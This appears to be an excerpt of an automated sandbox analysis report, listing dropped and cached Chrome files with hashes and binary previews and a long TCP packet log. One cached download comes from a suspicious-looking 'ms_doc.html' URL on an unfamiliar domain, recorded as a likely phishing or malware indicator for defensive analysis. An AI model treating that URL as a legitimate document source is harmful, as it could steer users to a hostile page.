Preview:	L..................F.@.. ...$+.,....../..Q..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 18 18:21:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.9937042456084892
Encrypted:	false
SSDEEP:	48:8UdhjTJ55fHvidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbFy+yT+:8SbYT/TbxWOvTbFy7T
MD5:	6C896761397EF16CF44A147D359713C9
SHA1:	B579127359122AE4E0A8FF0479B4B15FE2E4F37A
SHA-256:	D8331334108D5D87DE9660539ADADF3141174271F9B3334D24A7A66299CFA5BB
SHA-512:	CBED8853DB79EBAC0E14DDDEB79C8A1E550C106E6ADE7B050BA70352BD90A7FD580547B29473D76CCBB41B9D682937FD1D8357E5311206F0099B5A1ED19DDA99
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,....xO...Q..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............-.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 60

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.452819531114783
Encrypted:	false
SSDEEP:	3:Has6Ln:6sCn
MD5:	CD598D2DCE38CFBA2981425AFD8CC5FF
SHA1:	56C8577B18B89C77A6AC58B925F8ECAB11BEF02C
SHA-256:	64BC0BCC655408713CCC3195B859007631C335758AAC8575658AC138509233E8
SHA-512:	61797961E4747CA9CD7B3E6746E5243F7D9EF59B21B27911E974CEB68460C71ED438FEAAE6C7E1BC77A50E687D63A26623DB0AC1204DEAC60D094EFD0271C6FA
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAl4chzaafkQjhIFDa8aOOA=?alt=proto
Preview:	CgkKBw2vGjjgGgA=

Chrome Cache Entry: 61

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, from Unix, original size modulo 2^32 353537
Category:	downloaded
Size (bytes):	260351
Entropy (8bit):	7.99761695799319
Encrypted:	true
SSDEEP:	6144:RAEVmVAifBubhJ8lzpwHcysbfMFG5HObaP3hR:RvmVACMbhMmHHefMs5uE3hR
MD5:	40EE24DC607C8AF932F321DC67EC9806
SHA1:	F321617419956148A601B5AE23CC6DAEFEAE096B
SHA-256:	4F5FADCEF00E3E1C3446F8CFAD8DDD2CC42FA81B9C788E05CCE31C358027B53D
SHA-512:	D0DDAB7890D8A00DF2D88BA4105A32D722F8A307967FEA609A33B76782FA19669A873407748DEE677056E2BCB5A3F53311986F058AEA11FD87F0A9DC4C593991
Malicious:	false
Reputation:	low
URL:	http://jonotarmot.com/dcs/ms_doc.html
Preview:	..........t.W..l..w.....<6..,..{..9'..9............KKH....u!.....3Y/....m...........d........N).......Pl._Y.,k...?\|O...........h.s.....e..........h....>........{...w......f............o..7.>.n..{..N.....................nQM._..........._.),../~_..H...}..d.....^.b......;=...>...._.N...J...,..(..}...k.4....W'M..Z.}...~Z.............R5......y..}.....?<.......uc.._...X.......w.....u.T..v....?<...4....5CR.........-...N....i...._..1..R.j....5.W4.4..k.KG.=.....T4..v.`...\r.T.r#A=..5....N.....d.....b.1..*..)..I..<..c.N...\|..:..p.X x...Mz...4.T....-....u`..f..@._.......... .@....?.......!h...F{.'.qA.O...D..FE.@..E .z... .^....X."......~@..hYA...}...2.H.1](.j......3....T^...Q./5.;..O{.4C.S...n...7...x..D.(`P)..(.K.><1....s.}...?.a..uS.....!.)-`eS#j.L........,."`.fd.R.....6.g...."...,5_m5U1.R..1.W."q.-.gG..... .........=..P...d.,Nt.."..j..= SWe[q.G.2.........i.N...^...9,...x\|..!...N.R...3....!.....L$.4..,Q.5..D.....c]T+Y.$R..x35:.zz)....

Static File Info

⊘No static file info

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 20:21:32.840131044 CET	49675	443	192.168.2.5	23.1.237.91
Dec 18, 2024 20:21:32.840153933 CET	49674	443	192.168.2.5	23.1.237.91
Dec 18, 2024 20:21:32.965188980 CET	49673	443	192.168.2.5	23.1.237.91
Dec 18, 2024 20:21:42.605751991 CET	49675	443	192.168.2.5	23.1.237.91
Dec 18, 2024 20:21:42.605753899 CET	49674	443	192.168.2.5	23.1.237.91
Dec 18, 2024 20:21:42.605819941 CET	49673	443	192.168.2.5	23.1.237.91
Dec 18, 2024 20:21:44.965401888 CET	443	49703	23.1.237.91	192.168.2.5
Dec 18, 2024 20:21:44.966281891 CET	49703	443	192.168.2.5	23.1.237.91
Dec 18, 2024 20:21:47.182389021 CET	49711	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:21:47.182452917 CET	443	49711	172.217.19.228	192.168.2.5
Dec 18, 2024 20:21:47.182538033 CET	49711	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:21:47.182734966 CET	49711	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:21:47.182746887 CET	443	49711	172.217.19.228	192.168.2.5
Dec 18, 2024 20:21:48.774382114 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:48.775043964 CET	49715	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:48.897622108 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:48.897722006 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:48.898153067 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:48.898344994 CET	80	49715	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:48.898556948 CET	49715	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:48.956428051 CET	443	49711	172.217.19.228	192.168.2.5
Dec 18, 2024 20:21:48.956707001 CET	49711	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:21:48.956716061 CET	443	49711	172.217.19.228	192.168.2.5
Dec 18, 2024 20:21:48.957931995 CET	443	49711	172.217.19.228	192.168.2.5
Dec 18, 2024 20:21:48.958007097 CET	49711	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:21:48.959332943 CET	49711	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:21:48.959398031 CET	443	49711	172.217.19.228	192.168.2.5
Dec 18, 2024 20:21:49.008462906 CET	49711	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:21:49.008481979 CET	443	49711	172.217.19.228	192.168.2.5
Dec 18, 2024 20:21:49.017803907 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:49.057506084 CET	49711	443	192.168.2.5	172.217.19.228
Dec 18, 2024 20:21:50.184212923 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.184334993 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.184348106 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.184397936 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.184678078 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.184690952 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.184721947 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.185064077 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.185075998 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.185254097 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.185277939 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.185333967 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.185446978 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.185458899 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.185513020 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.304820061 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.304928064 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.305243015 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.308957100 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.353765011 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.377146959 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.377161026 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.377237082 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.379695892 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.379771948 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.380044937 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.388032913 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.388171911 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.388225079 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.396446943 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.396559000 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.396716118 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.404874086 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.405014038 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.405224085 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.413141012 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.413269997 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.413537979 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.421539068 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.421607971 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.421665907 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.430617094 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.430682898 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.430769920 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.438266993 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.438378096 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.440751076 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.446676016 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.447042942 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.447285891 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.473324060 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.473436117 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.473824978 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.493242979 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.496783018 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.496795893 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.496856928 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.569331884 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.569376945 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.569519997 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.571687937 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.571796894 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.571913004 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.576447010 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.578128099 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.578197956 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.578345060 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.582925081 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.582995892 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.583141088 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.587584019 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.587627888 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.587685108 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.592370033 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.592456102 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.592459917 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.597342968 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.597393990 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.597433090 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.601804018 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.601859093 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.602157116 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.606517076 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.606601000 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.606767893 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.611289024 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.611351013 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.611383915 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.616132021 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.616183043 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.616218090 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.620767117 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.620819092 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.620898008 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.625452995 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.625518084 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.625546932 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.630223036 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.630332947 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.630400896 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.633872986 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.633924961 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.633961916 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.637425900 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.637479067 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.637501001 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.641134977 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.641190052 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.641222954 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.644812107 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.644870043 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.644932032 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.648477077 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.648530960 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.648547888 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.652046919 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.652168036 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.652225018 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.655703068 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.655790091 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.655848980 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.659389019 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.659441948 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.704530954 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.704598904 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.705059052 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.706347942 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.746146917 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.761835098 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.761923075 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.762006998 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.763389111 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.763465881 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.763590097 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.766299963 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.767365932 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.767425060 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.767528057 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.770412922 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.770492077 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.770541906 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.773336887 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.773386955 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.773432016 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.776230097 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.776283979 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.776292086 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.779047966 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.779103994 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.779409885 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.781663895 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.781707048 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.781783104 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.784265995 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.784316063 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.784765005 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.787055969 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.787108898 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.787250042 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.789611101 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.789684057 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.789736986 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.792112112 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.792251110 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.792787075 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.794749022 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.794830084 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.795078039 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.797358990 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.797410011 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.797472954 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.799890041 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.800013065 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.800079107 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.802519083 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.802568913 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.802608967 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.805196047 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.805249929 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.805641890 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.807693005 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.807766914 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.807888031 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.810324907 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.810370922 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.810478926 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.812897921 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.812974930 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.813024044 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.815577984 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.815691948 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.815747976 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.818031073 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.818154097 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.818279028 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.820694923 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.820797920 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.820804119 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.823261976 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.823338985 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.823359966 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.825813055 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.825861931 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.825897932 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.828393936 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.828501940 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.828635931 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.830993891 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.831051111 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.831099987 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.833622932 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.833683968 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.833729982 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.836183071 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.836282015 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.836282969 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.838735104 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.838840008 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.838850975 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.841111898 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.841175079 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.841218948 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.843461037 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.843491077 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.843545914 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.896605015 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.896739960 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.896944046 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.897875071 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.898097038 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.898142099 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.900140047 CET	80	49714	198.54.120.20	192.168.2.5
Dec 18, 2024 20:21:50.944562912 CET	49714	80	192.168.2.5	198.54.120.20
Dec 18, 2024 20:21:50.955048084 CET	80	49714	198.54.120.20	192.168.2.5
